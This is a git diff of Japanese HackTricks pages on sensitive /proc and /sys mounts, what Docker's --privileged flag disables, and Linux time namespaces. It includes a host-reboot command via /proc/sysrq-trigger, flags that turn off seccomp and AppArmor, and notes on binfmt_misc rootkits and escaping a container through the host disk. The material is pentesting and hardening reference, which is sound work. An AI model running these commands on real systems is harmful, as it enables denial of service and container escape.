@ -51,20 +50,20 @@ ls -l $(cat /proc/sys/kernel/modprobe) # modprobeへのアクセスを確認
- 書き込みアクセスはホストに対するさまざまなサービス拒否攻撃を有効にする可能性があります。
### **`/proc/sys/fs/binfmt_misc`**
- マジックナンバーに基づいて非ネイティブバイナリ形式のインタプリタを登録することを許可します。
- マジックナンバーに基づいて非ネイティブバイナリ形式のインタプリタを登録することができます。
- `/proc/sys/fs/binfmt_misc/register`が書き込み可能である場合、特権昇格やルートシェルアクセスにつながる可能性があります。
- 関連する悪用と説明:
- [binfmt_miscを使用した貧乏人のルートキット](https://github.com/toffan/binfmt_misc)
- 関連するエクスプロイトと説明:
- [binfmt_miscを使用した貧乏ルートキット](https://github.com/toffan/binfmt_misc)
- 詳細なチュートリアル:[ビデオリンク](https://www.youtube.com/watch?v=WBC7hhgMvQQ)
## `/proc`のその他
## `/proc`のその他の項目
### **`/proc/config.gz`**
- `CONFIG_IKCONFIG_PROC`が有効になっている場合、カーネル構成を公開する可能性があります。
- 実行中のカーネルの脆弱性を特定するために攻撃者に役立ちます。
### **`/proc/sysrq-trigger`**
- Sysrqコマンドを呼び出すことを許可し、即座のシステム再起動やその他の重要なアクションを引き起こす可能性があります。
- Sysrqコマンドを呼び出すことができ、即座のシステム再起動やその他の重要なアクションを引き起こす可能性があります。
- **ホストの再起動例**
```bash
echo b > /proc/sysrq-trigger # ホストを再起動
@ -72,16 +71,16 @@ echo b > /proc/sysrq-trigger # ホストを再起動
### **`/proc/kmsg`**
- カーネルリングバッファメッセージを公開します。
- カーネルの悪用、アドレスリーク、および機密システム情報の提供に役立ちます。
- カーネルのエクスプロイト、アドレスリーク、および機密システム情報の提供に役立ちます。
### **`/proc/kallsyms`**
- カーネルがエクスポートしたシンボルとそのアドレスをリストします。
- 特にKASLRを克服するためにカーネル悪用開発に不可欠です。
- `kptr_restrict`が`1`または`2`に設定されているとアドレス情報が制限されます。
- 詳細は[proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html)にあります。
- 特にKASLRを克服するためにカーネルエクスプロイトの開発に不可欠です。
- `kptr_restrict`が`1`または`2`に設定されているとアドレス情報が制限されます。
- 詳細は[proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html)に記載されています。
### **`/proc/[pid]/mem`**
- カーネルメモリデバイス`/dev/mem`とのインタフェースです。
- カーネルメモリデバイス`/dev/mem`とのインタフェースです。
- 歴史的に特権昇格攻撃の脆弱性があります。
- [proc(5)](https://man7.org/linux/man-pages/man5/proc.5.html)で詳細に説明されています。
@ -89,15 +88,15 @@ echo b > /proc/sysrq-trigger # ホストを再起動
- ELFコア形式でシステムの物理メモリを表します。
- 読み取りによりホストシステムや他のコンテナのメモリ内容が漏洩する可能性があります。
- 大きなファイルサイズは読み取りの問題やソフトウェアのクラッシュを引き起こす可能性があります。
- [2019年の/proc/kcoreのダンプ](https://schlafwandler.github.io/posts/dumping-/proc/kcore/)での詳細な使用法。
- 2019年の[Dumping /proc/kcore](https://schlafwandler.github.io/posts/dumping-/proc/kcore/)での詳細な使用法。
### **`/proc/kmem`**
- カーネル仮想メモリを表す`/dev/kmem`の代替インタフェースです。
- 読み取りと書き込みを許可し、したがってカーネルメモリの直接的な変更を可能にします。
- カーネル仮想メモリを表す`/dev/kmem`の代替インタフェースです。
- 読み取りと書き込みが可能であり、カーネルメモリの直接変更を許可します。
### **`/proc/mem`**
- 物理メモリを表す`/dev/mem`の代替インタフェースです。
- 読み取りと書き込みを許可し、すべてのメモリの変更には仮想から物理アドレスへの解決が必要です。
- 物理メモリを表す`/dev/mem`の代替インタフェースです。
- 読み取りと書き込みが可能であり、すべてのメモリの変更には仮想から物理アドレスへの解決が必要です。
### **`/proc/sched_debug`**
- PID名前空間の保護をバイパスしてプロセススケジューリング情報を返します。
@ -135,22 +134,22 @@ cat /output
- カーネルアドレスを漏洩し、KASLRを危険にさらす可能性があります。
### **`/sys/kernel/security`**
- Linux Security ModulesAppArmorなどの構成を許可する`securityfs`インタフェースを提供します。
- Linux Security ModulesAppArmorなどの構成を許可する`securityfs`インタフェースを提供します。
- アクセス権限により、コンテナがMACシステムを無効にする可能性があります。
### **`/sys/firmware/efi/vars`および`/sys/firmware/efi/efivars`**
- NVRAMのEFI変数とのやり取りのためのインタフェースを公開します。
- NVRAMのEFI変数とのやり取りを行うインターフェースを公開します。
- 誤構成や悪用により、ブリック化したノートパソコンや起動不能なホストマシンにつながる可能性があります。
### **`/sys/kernel/debug`**
- `debugfs`はカーネルに対する「ルールのない」デバッグインタフェースを提供します。
- 制限のない性質からセキュリティ問題の歴史があります。
- `debugfs`はカーネルに対する「ルールのない」デバッグインタフェースを提供します。
- 制限のない性質からセキュリティ問題が発生しています。
# 参考文
# 参考文
* [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)
* [Linuxコンテナの理解と強化](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc\_group\_understanding\_hardening\_linux\_containers-1-1.pdf)
* [特権および非特権Linuxコンテナの悪用](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container\_whitepaper.pdf)
* [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc\_group\_understanding\_hardening\_linux\_containers-1-1.pdf)
* [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container\_whitepaper.pdf)
<details>
@ -159,11 +158,10 @@ cat /output
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合は** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい場合は**[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)を入手す
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦で**@carlospolopm**を**フォロー**する。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
* **ハッキングトリックを共有するには** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出してください。
</details>

91
linux-hardening/privilege-escalation/docker-security/docker-privileged.md
View file

@ -4,30 +4,32 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
* [**公式PEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
</details>
## 影響
特権付きコンテナを実行すると、次の保護が無効になります:
特権付きコンテナとしてコンテナを実行すると、次の保護が無効になります:
### /devマウント
### /devマウント
特権付きコンテナでは、すべての**デバイスに`/dev/`でアクセスできます**。したがって、ホストのディスクを**マウント**することで**脱出**することができます。
特権付きコンテナでは、すべての**デバイスに `/dev/`**でアクセスできます。そのため、ホストのディスクを**マウント**して**脱出**することができます。
{% tabs %}
{% tab title="デフォルトコンテナ内部" %}
{% tab title="デフォルトコンテナ内部" %}
```bash
# docker run --rm -it alpine sh
ls /dev
console fd mqueue ptmx random stderr stdout urandom
core full null pts shm stdin tty zero
```
{% endtab %}
{% tab title="特権コンテナ内部" %}
```bash
# docker run --rm --privileged -it alpine sh
@ -38,15 +40,9 @@ core mqueue ptmx stdin tty26
cpu nbd0 pts stdout tty27 tty47 ttyS0
[...]
```
{% endtab %}
{% endtabs %}
### 読み取り専用のカーネルファイルシステム
カーネルファイルシステムは、**プロセスがカーネルの実行方法を変更するメカニズム**を提供します。デフォルトでは、**コンテナプロセスがカーネルを変更することは望ましくありません**ので、コンテナ内でカーネルファイルシステムを読み取り専用でマウントします。
{% tabs %}
{% tab title="デフォルトのコンテナ内部" %}
カーネルファイルシステムは、プロセスがカーネルの動作を変更する仕組みを提供します。ただし、コンテナプロセスの場合、カーネルに変更を加えることを防ぎたいです。したがって、コンテナ内でカーネルファイルシステムを**読み取り専用**でマウントし、コンテナプロセスがカーネルを変更できないようにします。
```bash
# docker run --rm -it alpine sh
mount | grep '(ro'
@ -55,24 +51,23 @@ cpuset on /sys/fs/cgroup/cpuset type cgroup (ro,nosuid,nodev,noexec,relatime,cpu
cpu on /sys/fs/cgroup/cpu type cgroup (ro,nosuid,nodev,noexec,relatime,cpu)
cpuacct on /sys/fs/cgroup/cpuacct type cgroup (ro,nosuid,nodev,noexec,relatime,cpuacct)
```
{% endtab %}
{% tab title="特権コンテナ内部" %}
```bash
# docker run --rm --privileged -it alpine sh
mount | grep '(ro'
```
{% endtab %}
{% endtabs %}
### カーネルファイルシステムのマスキング
**/proc**ファイルシステムはネームスペースに対応しており、特定の書き込みが許可されるため、読み取り専用でマウントされません。ただし、/procファイルシステムの特定のディレクトリは、書き込みから**保護される必要があり**、一部の場合は**読み取りからも保護される必要があります**。これらの場合、コンテナエンジンは潜在的に危険なディレクトリに対して**tmpfs**ファイルシステムをマウントし、コンテナ内のプロセスがそれらを使用できないようにします。
**/proc**ファイルシステムは選択的に書き込み可能ですが、セキュリティのため、一部の部分は**tmpfs**でオーバーレイされ、コンテナプロセスが機密領域にアクセスできないように保護されています。
{% hint style="info" %}
**tmpfs**は、すべてのファイルを仮想メモリに格納するファイルシステムです。tmpfsはハードドライブにファイルを作成しません。したがって、tmpfsファイルシステムをアンマウントすると、それに存在するすべてのファイルが永久に失われます。
**tmpfs**は仮想メモリにすべてのファイルを保存するファイルシステムです。tmpfsはハードドライブにファイルを作成しません。したがって、tmpfsファイルシステムをアンマウントすると、その中にあるすべてのファイルが永遠に失われます。
{% endhint %}
{% tabs %}
{% tab title="デフォルトコンテナ内部" %}
{% tab title="デフォルトコンテナ内部" %}
```bash
# docker run --rm -it alpine sh
mount | grep /proc.*tmpfs
@ -80,17 +75,16 @@ tmpfs on /proc/acpi type tmpfs (ro,relatime)
tmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/keys type tmpfs (rw,nosuid,size=65536k,mode=755)
```
{% endtab %}
{% tab title="特権コンテナ内部" %}
```bash
# docker run --rm --privileged -it alpine sh
mount | grep /proc.*tmpfs
```
{% endtab %}
{% endtabs %}
### Linux capabilities
### Linuxの機能
コンテナエンジンは、デフォルトではコンテナ内で何が行われるかを制御するために、**制限された数の機能**でコンテナを起動します。**特権**の場合は、**すべての機能**にアクセスできます。機能については、以下を参照してください。
コンテナエンジンは、コンテナを**デフォルトで内部で何が起こるかを制御するために、**制限された数の機能**で起動します。**特権**を持つものは、**すべて**の**機能**にアクセスできます。機能について学ぶには、以下を参照してください:
{% content-ref url="../linux-capabilities.md" %}
[linux-capabilities.md](../linux-capabilities.md)
@ -106,6 +100,8 @@ Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,ca
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
[...]
```
{% endtab %}
{% tab title="特権コンテナ内部" %}
```bash
# docker run --rm --privileged -it alpine sh
@ -118,24 +114,23 @@ Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fset
{% endtab %}
{% endtabs %}
`--privileged` mode gives all capabilities to the container, but it is not recommended for security reasons. Instead, you can use the `--cap-add` flag to add specific capabilities to the container and the `--cap-drop` flag to remove specific capabilities.
`--cap-add`および`--cap-drop`フラグを使用して、`--privileged`モードで実行せずにコンテナで利用可能な機能を操作できます。
### Seccomp
**Seccomp**は、コンテナが呼び出すことができる**シスコール**を制限するために役立ちます。Dockerコンテナを実行すると、デフォルトのSeccompプロファイルが有効になりますが、特権モードでは無効になります。Seccompについて詳しくはこちらを参照してください
**Seccomp**は、コンテナが呼び出すことができる**syscalls**を**制限**するのに役立ちます。 Dockerコンテナを実行する際にはデフォルトでSeccompプロファイルが有効になっていますが、特権モードでは無効になります。 Seccompについて詳しくはこちら
{% content-ref url="seccomp.md" %}
[seccomp.md](seccomp.md)
{% endcontent-ref %}
{% tabs %}
{% tab title="デフォルトのコンテナ内部" %}
```bash
# docker run --rm -it alpine sh
grep Seccomp /proc/1/status
Seccomp: 2
Seccomp_filters: 1
```
{% endtab %}
{% tab title="特権コンテナ内部" %}
```bash
# docker run --rm --privileged -it alpine sh
@ -149,22 +144,18 @@ Seccomp_filters: 0
# You can manually disable seccomp in docker with
--security-opt seccomp=unconfined
```
また、Dockerまたは他のCRIsが**Kubernetes**クラスターで使用される場合、**seccompフィルターはデフォルトで無効**になっていることに注意してください
また、Dockerまたは他のCRIsが**Kubernetes**クラスターで使用される場合、**seccompフィルターはデフォルトで無効**になります
### AppArmor
**AppArmor**は、**コンテナ**を**制限された**一部の**リソース**と**プログラムごとのプロファイル**に制約するためのカーネルの拡張機能です。`--privileged`フラグを使用して実行すると、この保護は無効になります。
{% content-ref url="apparmor.md" %}
[apparmor.md](apparmor.md)
{% endcontent-ref %}
**AppArmor**は、**プログラムごとのプロファイル**を使用して**コンテナ**を**限られた****リソース**に制限するためのカーネルの拡張機能です。`--privileged`フラグを使用すると、この保護が無効になります。
```bash
# You can manually disable seccomp in docker with
--security-opt apparmor=unconfined
```
### SELinux
`--privileged`フラグを使用すると、**SELinuxラベルが無効化**され、コンテナは**コンテナエンジンが実行されたときのラベルで実行**されます。このラベルは通常`unconfined`であり、コンテナエンジンが持つラベルに**完全なアクセス権限**を持ちます。ルートレスモードでは、コンテナは`container_runtime_t`で実行されます。ルートモードでは、`spc_t`で実行されます。
`--privileged` フラグを使用してコンテナを実行すると、**SELinux ラベル**が無効になり、通常 `unconfined` のようなコンテナエンジンのラベルを継承し、コンテナエンジンと同様の完全アクセスが付与されます。ルートレスモードでは `container_runtime_t` を使用し、ルートモードでは `spc_t` が適用されます。
{% content-ref url="../selinux.md" %}
[selinux.md](../selinux.md)
@ -175,9 +166,9 @@ Seccomp_filters: 0
```
## 影響を受けないもの
### ネームスペース
### 名前空間
ネームスペースは`--privileged`フラグによって**影響を受けません**。セキュリティ制約が有効になっていないため、システム上のすべてのプロセスやホストネットワークを見ることはありません。ユーザーは、**`--pid=host`、`--net=host`、`--ipc=host`、`--uts=host`**のコンテナエンジンフラグを使用して個々のネームスペースを無効にすることができます。
名前空間は`--privileged`フラグの影響を受けません。セキュリティ制約が有効になっていないにもかかわらず、**システム上のすべてのプロセスやホストネットワークを見ることはできません**。ユーザーは、**`--pid=host`、`--net=host`、`--ipc=host`、`--uts=host`**のコンテナエンジンフラグを使用して個々の名前空間を無効にできます。
{% tabs %}
{% tab title="デフォルトの特権付きコンテナ内部" %}
@ -188,7 +179,9 @@ PID USER TIME COMMAND
1 root 0:00 sh
18 root 0:00 ps -ef
```
{% tab title="ホスト内 --pid=host コンテナ" %}
{% endtab %}
{% tab title="ホストの--pid=hostコンテナ内部" %}
```bash
# docker run --rm --privileged --pid=host -it alpine sh
ps -ef
@ -201,9 +194,9 @@ PID USER TIME COMMAND
{% endtab %}
{% endtabs %}
### ユーザーネームスペース
### ユーザー名前空間
コンテナエンジンはデフォルトではユーザーネームスペースを使用しません。ただし、ルートレスコンテナは常にユーザーネームスペースを使用してファイルシステムをマウントし、単一のUID以上を使用します。ルートレスの場合、ユーザーネームスペースは無効にすることはできません。ルートレスコンテナを実行するためには、ユーザーネームスペースが必要です。ユーザーネームスペースは特定の特権を防止し、セキュリティを向上させます。
**デフォルトでは、コンテナエンジンはユーザー名前空間を利用しません。ただし、ルートレスコンテナでは、ファイルシステムのマウントや複数のUIDの使用に必要とされるため、ユーザー名前空間が使用されます。** ルートレスコンテナには不可欠であり、特権を制限することでセキュリティを大幅に向上させます。
## 参考文献
@ -213,10 +206,10 @@ PID USER TIME COMMAND
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
* [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFT](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
* [**公式PEASSHackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出して、あなたのハッキングトリックを共有してください。
</details>

69
linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md
View file

@ -1,52 +1,52 @@
# Time Namespace
# タイムネームスペース
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricks をサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)、当社の独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) コレクションを発見する
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) をフォローする**
* **ハッキングテクニックを共有するには、** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出してください
</details>
## 基本情報
Time Namespaceは、システムのモトニッククロックとブートタイムクロックに対して、名前空間ごとのオフセットを可能にします。Time Namespaceは、コンテナ内で日付/時刻を変更したり、チェックポイント/スナップショットからの復元後にコンテナ内のクロックを調整するために、Linuxコンテナの使用に適しています。
Linux のタイムネームスペースは、システムの単調増加時計と起動時刻クロックに対するネームスペースごとのオフセットを可能にします。Linux コンテナでは、コンテナ内の日付/時刻を変更し、チェックポイントやスナップショットから復元した後にクロックを調整するために一般的に使用されます。
## ラボ:
## Lab:
### 異なるNamespaceを作成する
### 異なるネームスペースを作成する
#### CLI
```bash
sudo unshare -T [--mount-proc] /bin/bash
```
`/proc` ファイルシステムの新しいインスタンスをマウントすることで、`--mount-proc` パラメータを使用すると、新しいマウント名前空間がその名前空間に特有の**正確で隔離されたプロセス情報のビューを持つことを保証します**
`--mount-proc` パラメータを使用して `/proc` ファイルシステムの新しいインスタンスをマウントすることで、新しいマウント名前空間がその名前空間固有のプロセス情報に正確で隔離されたビューを持つことが保証されます
<details>
<summary>エラー: bash: fork: メモリを割り当てることができません</summary>
<summary>エラー: bash: fork: Cannot allocate memory</summary>
`unshare` `-f` オプションなしで実行すると、Linuxが新しい PID (プロセス ID) 名前空間を扱う方法により、エラーが発生します。重要な詳細と解決策は以下の通りです:
`-f` オプションを指定せずに `unshare` を実行すると、Linux が新しい PID (プロセス ID) 名前空間を処理する方法によりエラーが発生します。主要な詳細と解決策は以下に示されています:
1. **問題の説明**:
- Linuxカーネルは、プロセスが `unshare` システムコールを使用して新しい名前空間を作成することを許可しています。しかし、新しい PID 名前空間の作成を開始するプロセス("unshare" プロセスと呼ばれる)は、新しい名前空間に入らず、その子プロセスのみが入ります。
- `%unshare -p /bin/bash%` を実行すると、`/bin/bash` `unshare` と同じプロセスで開始されます。その結果、`/bin/bash` とその子プロセスは元の PID 名前空間にあります。
- 新しい名前空間`/bin/bash` の最初の子プロセスは PID 1 になります。このプロセスが終了すると、他のプロセスがない場合、名前空間のクリーンアップがトリガーされます。なぜなら、PID 1 は孤立したプロセスを引き継ぐ特別な役割を持っているからです。その後、Linuxカーネルはその名前空間での PID 割り当てを無効にします。
- Linux カーネルは、`unshare` システムコールを使用してプロセスが新しい名前空間を作成することを許可します。ただし、新しい PID 名前空間の作成を開始するプロセス("unshare" プロセスと呼ばれる)は、新しい名前空間に入りません。その子プロセスのみが入ります。
- `%unshare -p /bin/bash%` を実行すると、`/bin/bash` `unshare` と同じプロセスで開始されます。その結果、`/bin/bash` とその子プロセスは元の PID 名前空間にあります。
- 新しい名前空間`/bin/bash` の最初の子プロセスは PID 1 になります。このプロセスが終了すると、他のプロセスがない場合、孤児プロセスを引き取る特別な役割を持つ PID 1 により、その名前空間のクリーンアップがトリガーされます。その後、Linux カーネルはその名前空間での PID 割り当てを無効にします。
2. **結果**:
- 新しい名前空間での PID 1 の終了は、`PIDNS_HASH_ADDING` フラグのクリーニングにつながります。これにより、新しいプロセスを作成する際に `alloc_pid` 関数が新しい PID を割り当てることができず、「メモリを割り当てることができません」というエラーが発生します。
- 新しい名前空間内の PID 1 の終了により、`PIDNS_HASH_ADDING` フラグのクリーニングが行われます。これにより、新しいプロセスを作成する際に `alloc_pid` 関数が新しい PID を割り当てられなくなり、"Cannot allocate memory" エラーが発生します。
3. **解決策**:
- この問題は、`unshare` と `-f` オプションを使用することで解決できます。このオプションは新しい PID 名前空間を作成した後に `unshare`新しいプロセスをフォークするようにします。
- `unshare` `-f` オプションを使用することで問題を解決できます。このオプションにより、`unshare` は新しい PID 名前空間を作成した後に新しいプロセスをフォークします。
- `%unshare -fp /bin/bash%` を実行すると、`unshare` コマンド自体が新しい名前空間で PID 1 になります。その後、`/bin/bash` とその子プロセスはこの新しい名前空間内に安全に含まれ、PID 1 の早期終了を防ぎ、通常の PID 割り当てを可能にします。
`unshare``-f` フラグで実行されることを確認することで、新しい PID 名前空間が正しく維持され、`/bin/bash` とそのサブプロセスがメモリ割り当てエラーに遭遇することなく作できるようになります。
`unshare``-f` フラグで実行されることを確認することで、新しい PID 名前空間が正しく維持され、`/bin/bash` とそのサブプロセスがメモリ割り当てエラーに遭遇することなく作できるようになります。
</details>
@ -54,12 +54,12 @@ sudo unshare -T [--mount-proc] /bin/bash
```bash
docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash
```
### プロセスがどのネームスペースにあるかを確認する
### &#x20;あなたのプロセスがどの名前空間にあるかを確認します
```bash
ls -l /proc/self/ns/time
lrwxrwxrwx 1 root root 0 Apr 4 21:16 /proc/self/ns/time -> 'time:[4026531834]'
```
### すべてのTimeネームスペースを見つける
### すべてのTime namespacesを見つける
{% code overflow="wrap" %}
```bash
@ -67,29 +67,10 @@ sudo find /proc -maxdepth 3 -type l -name time -exec readlink {} \; 2>/dev/null
# Find the processes with an specific namespace
sudo find /proc -maxdepth 3 -type l -name time -exec ls -l {} \; 2>/dev/null | grep <ns-number>
```
{% endcode %}
### 時間ネームスペースに入る
### Time ネームスペースに入る
{% endcode %}
```bash
nsenter -T TARGET_PID --pid /bin/bash
```
```markdown
また、**rootでなければ他のプロセスのネームスペースに** **入ることはできません**。そして、それを指すディスクリプタ(`/proc/self/ns/net`のような)**なしに**他のネームスペースに**入ることは** **できません**
# 参考文献
* [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ</strong></summary>
HackTricksをサポートする他の方法:
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションです
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で私を**フォロー**してください。
